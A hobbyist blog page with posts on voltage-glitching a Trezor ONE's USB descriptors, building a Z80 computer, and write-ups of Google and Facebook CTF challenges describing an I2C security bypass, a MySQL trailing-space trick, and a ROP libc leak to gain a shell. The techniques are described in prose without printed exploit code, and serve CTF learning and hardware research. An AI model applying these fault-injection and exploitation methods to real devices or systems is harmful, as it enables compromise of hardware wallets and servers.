USB Descriptor Glitching with Facedancer21

Over the past week, I have been slowly progressing on glitching USB descriptors of a Trezor ONE. I have succeeded in creating a framework for this, and other USB-based glitching attacks, and will document this work for future reference. As background reading, I advise that you review the following resources:

Overview

In a nutshell, this attack was performed using a Chipwhisperer back-end to insert a VCC glitch, a Facedancer to handle USB interfacing and some Python scripting to tie it all together.

The Facedancer is a GoodFET core (well, an MSP430 microcontroller) tied to a MAX3421 front-end over an SPI bus, and a FTDI UART IC for host communication. It’s originally designed to interface arbitrarily with USB, and has no support for glitch triggering – but it is easy to modify the MAXUSB app (goodfet/firmware/apps/usb/maxusb.c) to override any command to do what READ/WRITE does, but also pull a pin high.

As an aside: the FTDI protocol is quite simple, and leads me to wonder why more pins are not broken out on the Facedancer for integration with other projects (and in this case, freeing a laptop USB port by driving the UART directly from the ChipWhisperer). I may add these in future.

Note that this isn’t perfect – there’s still significant horizontal jitter between when the MSP430 tells the MAX3421 to send a USB packet, and when vulnerable code executes on the target – but it’s better than nothing.

The final Facedancer modification looks like this:

You’ll note an extra GPIO pin is broken out (second from the right, far right is trigger) – this controls a 2N7000 pin which resets the Trezor after every glitch insertion.

Finally, the Python driver code must be modified to support a variant form of USB transaction, where we simply call IN_Transfer continuously until it falls over or nothing is transmitted. This is described in scanlime’s glitching video, and is included in the source repository listed below.

Timing

One of the most significant challenges in this exercise was to correctly time the glitch. To an extent, this is impossible – due to natural jitter on both ends of the USB pipe, it’s impossible to accurately time any glitch perfectly, with a degree of reliability. Instead, my goal was to time the glitch so it landed in the right ballpark. This is compounded by the ChipWhisperer’s clock not being synchronised with the target’s internal PLL.

This is ultimately a small problem that can be solved with some logic analyzer time:

Of course, the actual parameters used will be different for you, depending on your clock generator configuration and USB sender setup.

Using a logic analyzer, I was able to also see when my glitches caused the device to reset, or enter an unrecoverable error state – this helped refine the size of my inserted glitches.

Note that it is also possible to generate glitches by affecting the output (at the other end, when a USB IN transfer occurs, but this (imo) is less likely to affect the actual integrity of the USB packet (just thinking logically, how would you implement it with a discrete USB controller – buffering it and waiting for the host to give you bandwidth is the only sane way to do it).

Target Preparation

Some work also needed to be done on the target, to prepare it for VCC glitching. Primarily, the decoupling capacitors need to be removed. If you are reading the datasheets for this, be careful that you count all the capacitors (including the VBAT ones) – these aren’t all located in one place on the official Trezor schematic.

An additional 2N7000 is used to allow the Facedancer to conveniently reset the device without power cycling the USB.

A power cleaning net is used to provide a relatively stable source of 3.3v power to the CPU: a pair of capacitors is used to clean the power supply (not perfect, but fuck knows it’s better than USB straight through a 3.3v regulator), and a small resistor (10 Ohms) is used to isolate the switching noise of the CPU so we’re better able to analyze our work with an oscilloscope.

Project Control

Finally, a Python script is used to tie together the Chipwhisperer and the script. This is similar to my other glitching experiments, and a copy of the code can be found on my Github. Note that no integration is available at the time of writing with my graphing / project review utilities, I’ll add these as time permits.

Note that you must build and update the Facedancer’s firmware if you want to use this the Python scripts make use of new commands which are not implemented by default.

Alternatively, Kate Temkin’s work might also be useful, particularly if you are using an alternative back-end to the MAX3421.

And with this, we sit back and wait for the glitches to appear:

Posted in Bards, Computers, Jesting | Leave a comment

The Z80 Adventure Part II

Today, I was able to use the Z80 I built last week to boot Grant Searle’s Z80 BASIC ROM without modifications, with access to both banks of SRAM. You can download this ROM file here.

Several core pieces of functionality had to be implemented to enable full operation, which will be described here.

“UART” from Z80

If you have been reviewing datasheets, you will note that unlike modern microcontrollers, there is no hardware serial RX/TX from the Z80. Instead, this function can be implemented in myriad different ways, depending on agreement between the BIOS (a handful of interrupt vectors counts right?) and the system designer – anything from memory mapped IO to in/out on special ports was OK.

In this case, as I wanted to run Grant Searle’s BASIC ROM, my implemention had to be compatible with what the ROM was expecting. The ROM implemented IO using IOREQ access to ports 0x80 (Control) and 0x81. Both are implemented by the ATMega.

Truth told, I didn’t understand the control register implementation, but I didn’t need to – the BASIC ROM only used this register to check for readiness to send and receive, so I faked it with fixed values, which was good enough to support the minimal requirement of allowing the Z80 to send and receive characters.

This leads us to our next problem…

Interrupts

Send and receive functionality is enough for an extremely primitive terminal, but is not enough for the BASIC console to work. The interrupt stub for the BASIC rom reveals why:

In truth, incoming characters were handled by a reset vector at 0x38 (no equivalent poll loops were present in BASIC.ASM).

I handled this by first converting the AVR’s UART to generate interrupts. This can be done by:

  • Setting the RXCIE bit in the UART control register.
  • At build/flash-time, registering the UART Receive Complete interrupt vector
  • After enabling hardware UART at runtime, enable global interrupts with sei()

This done, I then modified the interrupt handler to buffer the stored character and set a global “interrupt pending” flag, such that the interrupt line could be asserted low at the next available clock cycle. A bit of trickery here – as the Z80 does not execute one instruction per cycle, we must hold the interrupt line until the interrupt is acknowledged, requiring the IOREQ and M1 lines to be held low, as per the following diagram:

To do this, I carved out another line from the AVR-Z80 address bus (remember: we need to pull each “unmanaged” address line to 0 so it doesn’t fragment our memory accesses) for M1. I wrote some handler code to assert an interrupt until acknowledgement, then insert a fake clock cycle to return an interrupt vector, incase I want Mode 2 interrupts in future.

By this point, I had enough for the BASIC interpreter to function, which leads us to our next problem…

SRAM / Bus Width

The BASIC ROM (interrupt stub + BASIC interpreter) was all of 8KB. Our newly shrunken address bus simply was not able to write 8KB to memory by itself – nor did I want to forcibly assert control of the WR/RD lines while the Z80 was held in reset.

Instead, I relied on using a small bootloader from the PSoC project, here. I modified this slightly to complete more quickly (as I only needed 0x2000, not 0x4000 bytes), and hard-coded this into the AVR program.

I then wrote a fake IO port at 0xFF as the original author did, serving up the BASIC ROM. Unfortunately, the BASIC ROM was too large to fit into the AVR’s SRAM, so I modified the code further to place both the bootloader and BASIC ROM into program memory, carefully refactoring code as necessary to support the change.

With all this done, BASIC successfully launches:

As an added bonus, the memory-selftest function indicates that both banks of SRAM are recognized by the Z80, and accessible to the user transparently. Hooray!

Posted in Bards, Computers, Jesting | Leave a comment

Just for Fun: The Z80 Adventure!

Earlier this week, I realized that I have a single piece of full-size prototyping board left. In a fit of madness, I decided that the best course of action was to build a small Z80 computer on it.

The Zilog Z80 is a CPU from the 70’s, powering venerable machines such as the TRS-80 and Sinclair ZX Spectrum (i.e. before computers were just machines to be dickheads to each other remotely).

I began by reading over the work of others, to get an idea of how I might build a simple computer. Some of the projects I found and reviewed were:

I particularly enjoyed the final project, which made use of a PSoC 5 development kit – I think the PSoC line is very flexible, and perhaps doesn’t see enough use in hobbyist projects, if only due to it’s obscure ecosystem compared to AVR/PIC.

Unlike modern microcontrollers, the Z80 does not include on-board ROM: instead, upon booting it asserts signals to request a single byte of memory from address 0, and will run whatever code is provided to it – therefore, instead of “programming” a Z80 as you would do with an AVR, you would program EEPROM’s and have the Z80 load them.

Incidentally, this is how game cartridges worked – by exposing the CPU’s address and data lines (and by extension, the system’s address and data buses), a set of EEPROM’s could feed additional data to the system. Alternatively, a microcontroller inside the cartridge could assert control of the bus, and run code entirely independently. It is my great misfortune that my project was done on a limited-space prototyping board, and I could not expose an expansion header that provided power and bus access.

Design-wise, I settled on a hybrid design, using an ATMega32A bootloader, 2 32KB blocks of static RAM, and some logic IC’s. The AVR would boot first, filling the SRAM with code while holding the Z80’s reset low. The AVR would then relinquish control of the address and data buses, then provide a clock signal and reset the Z80, allowing the machine to boot. Some virtual logic analyzer code within the AVR then allows us to inspect the Z80’s buses, and if need be, play the part of a hardware debugger.

I began by constructing a test circuit, based on this. To confirm signs of life, I wired up the ATMega32A to generate a slow 5Hz clock signal to the Z80, with the data bus pulled down to 0 (i.e. a stream of nop’s), and LED’s on the address lines. You can see this working here:

At this point, I decided my next task was to build some code to program the SRAM chips. While a traditional Z80 would use an EEPROM (containing CP/M, BASIC or what have you), it is fine to use an SRAM chip for this instead, as long as you load it with data before the Z80 comes out of reset. Programming a parallel SRAM was much simpler than I thought, and was simply a matter of setting the address and data buses and pulsing chip enable and write enable.

With the EEPROM’s programmed, I moved on to wiring up the Z80. The Z80 CPU comes with a 16-bit address bus, so I used a hex inverter and a 74-series OR gate to build a SRAM bank selector depending on chip enable and the highest bit of the address bus (pulled down, as we never asserted this from the AVR). The rest of the pins were wired up to the AVR, with some quirks:

  • The wait pin was wired up as an input with a pull up for the Z80 and an input for the AVR. We control the clock and can stretch it for a delay.
  • I couldn’t get the Z80 to relinquish control of the bus control (i.e. tri-state everything) entirely using BUSREQ, so I put current limiting resistors on WR/RD and the corresponding pins on the AVR. This is only used during bootloading – let me know if you’ve got a reliable way to fix this.
  • Strong pull down resistors were used on the upper bits of the address bus of the Z80 – these needed to be 0 during the bootloader process, as they’re address inputs on the SRAM chips, but otherwise the Z80 could have control

The completed work looked somewhat OK:

Note the additional resistors on the right of the hex inverter on the top right – I managed to purchase an open-drain version when I went to Jaycar, and the cost of this oversight was 5 resistors.

The back-side can be accurately represented by the bowl of noodles emoji.

Some quick test code later, and the Z80 was able to load and execute a test loop, reading code from memory and correctly performing math and control transfer operations.

The final hurdle was to correctly implement IO instructions. The IO of the Z80, according to the datasheet, was an 8-bit address and data bus (that is: memory could have 64k, but only 255 IO ports existed), and a special IOREQ data pin. OUT instructions were no problem as all the AVR’s bus pins could remain as inputs, but IN instructions required flipping the bus direction and some careful timing:

As you can see by reviewing the slightly diagonal datasheet that’s just images so you can’t search (and which definitely isn’t a troll from Zilog), there is some delay between the assertion of IOREQ / RD and the moment the CPU recognizes the data bus. I found I could reliably set this by forging a single clock cycle (after which IOREQ / RD are no longer asserted low), which I did, and confirmed with some simple test code:

To me, this marks the completion of building a core Z80 system. Everything else is simply implementing peripheral support – with the CPU working and having a line of communication to the outside world, the AVR here can play the role of “hardware gatekeeper”, bridging peripheral IO requests to appropriate peripherals, or in it’s simplest mode, simply relaying serial output.

Thankyou to everyone who attempted similar projects before me – I would not have been able to complete this project so quickly without standing on the shoulders of giants. You can find my code here, along with a collection of datasheets and saved reference material so you don’t need to visit HTTP sites from the age of Geocities. I hope this proves useful to someone else.

 

Posted in Bards, Computers, Jesting | Leave a comment

Writeup – flagrom (Google CTF)

This weekend, I participated in Google CTF 2019. I was able to solve one challenge during the time allocated, and the writeup is below.

Flagrom

Many thanks to netcat for a nudge in the right direction for this challenge.

This challenge was presented as an archive containing source code and a binary, which you can download here. The challenge flavor text indicated a flag was in a secure EEPROM, and it was our task to fetch it.

A target server and port were also provided. On connecting to this host, I was greeted with a proof of work challenge:

I then brute wrote a (pretty crap) MD5 brute forcer, and patched out the same check in the flagrom binary:

With a little further investigation, the flagrom binary appears to be a Verilator executable (seeprom.sv, referred to as “the seeprom” from here) glued onto an 8051 emulator. The binary would instantiate the seeprom, run firmware.8051 and then run 8051 code which we supplied. The supplied payload needed to be an 8051 ELF file, as confirmed by feeding the program the supplied firmware.8051 as a payload.

At this point, it’s worth mentioning that I wasted a significant amount of time attempting to gain code execution by manipulating the provided ELF file (i.e. manually moving instructions around), which is my typical approach when confronted with strange architectures. It wasn’t until a while later that I realized sdcc, the Small Device C Compiler, could generate working ELF binaries.

We then turn to investigating the provided 8051 firmware, and the seeprom itself. The 8051 code is a wrapper which manipulates a seeprom – it writes a flag to the seeprom via an I2C command (and verifies it after with a second I2C command), “secures” the flag and then writes a test message in an unsecured portion of the seeprom.

The seeprom itself supports 2 I2C commands:

  • I2C_CONTROL_EEPROM, accessible at addresses starting with 0b1010
  • I2C_CONTROL_SECURE, accessible at addresses starting with 0b0101

Initially, I thought I could get an easy win by simply unsetting the security flag, but the I2C_CONTROL_SECURE function appears to be implemented securely, with only the ability to secure more sectors, not arbitrarily remove the security flag:

Our goal is to read out a flag, so we investigate the… control flow (does control flow apply to Verilog?). In order to read a section we must meet the following conditions:

  • At the start of the read command, i2c_address_valid must be true
    • This is only set when an address is loaded
    • This is unset at the end of each command (indicated by i2c_stop), or
  • At the end of each byte read, i2c_address_secure == i2c_next_address_secure must be true
    • These are wired, so there’s not really any “set” or “unset” action here.

Unfortunately, none of the I2C helper functions in the provided firmware.c file seemed to allow skipping of the i2c_stop command, but helpfully, the SCL and SDA wires were directly broken out to the 8051 user code – so the solution was to bit-bang I2C.

Not wanting to write I2C bit-bang functions myself, I searched for how to interface 8051 to an EEPROM, and lo and behold, I found this. I stole the bit-bang wrapper functions, and wrote some test harnesses, indicating successful basic control of read and write.

The final trick lay in the timing of the I2C commands: we’re not able to “unmark” page security flags, so in order to ensure i2c_address_secure == i2c_next_address_secure (and not get caught at the page 1 boundary), we need to construct a single I2C transaction which:

  • Loads an address before 0x64 (setting i2c_address_valid)
  • Sets all the pages to secure (ensuring i2c_address_secure == i2c_next_address_secure)
  • Reads from the already loaded address, without loading further addresses.

A little code finesse later, and the flag is revealed:

You can download the completed exploit code here.

Thankyou to Google for hosting this event – this has given me an opportunity to begin rebuilding a community of like-minded CTF players, and I continue to learn alot from the challenges I didn’t attempt to solve.

Posted in Bards, Computers, Jesting | Leave a comment

Writeups – products-manager, overfloat (Facebook CTF)

This weekend, I participated in the Facebook CTF event. The quality of challenges in this CTF was decent, but the event was marred by significant connectivity problems, rendering it unplayable for a significant portion of time for me.

I solved two challenges during this event, as always, the writeups are below.

Products Manager

This challenge was presented as a web challenge, with corresponding source code, which you can download here.

We can identify the core of the challenge by reviewing db.php:

Inspection of the source code shows that there is surprisingly limited attack surface, and that all SQL queries are sensibly parameterised. A poor choice of setup in the CTF gave the solution away: I noticed that at one point, two “facebook” entries were present in the “top 5” list.

This indicated that it was possible to both add another entry called “facebook” (or close to it), and that the web application was a shared, stateful application – an interesting choice for the expected player turnout.

A bit of fiddling later, and I was able to add “facebook” with an encoded space (“+”) at the end:

Following this, I could extract the flag by correctly supplying the secret that I knew.

Logic would have it that this was an edge case in MySQL, regarding adding items with blank spaces after them in queries, or matching them – a useful trick for later, but 100 points for now.

Overfloat

This challenge was presented as a pwnable challenge. The pwn binary can be downloaded here, along with the corresponding libc.

Upon initial analysis, this application performed some floating point maths:

I did some local debugging with gdb and comparing inputs and outputs, but got nowhere until I used retdec to decompile the binary. You can download the decompiled source here.

This made the program logic much clearer, and the structure was immediately revealed as a “rop builder” challenge: the program would effectively allow the user to enter rop gadgets at will as floats, and then trigger a stack-based overflow. To bypass the first hurdle, I created a simple C program which did the appropriate float conversion. You can download this here.

We can quickly confirm that we have the appropriate stack execution:

From here, traditional wisdom (and the fact that we have libc) indicates that we should leak an offset within libc, reset execution, then re-exploit the overflow to call a magic gadget (or system-equivalent point) to get a shell.

The leak was trivial to accomplish through loading RDI then calling puts at 0x400690. The program execution is reset to 0x400749, and then the exploit is re-fired against a known target. Of note, note that RBP is fucked at this point thanks to the leave instruction, and the remote target behaved differently to my local machine, resulting in a frustrating period of yes/no debugging via printf rop chain links – but flags are flags.

You can download the complete exploit here.

Thanks to the organisers and challenge creators of this CTF – this was a good exercise for someone who hasn’t CTF’ed for quite some time, and a steady reminder that no matter the strengths of one’s motivations, only results matter. See you in the next CTF.

Posted in Bards, Computers, Jesting | Leave a comment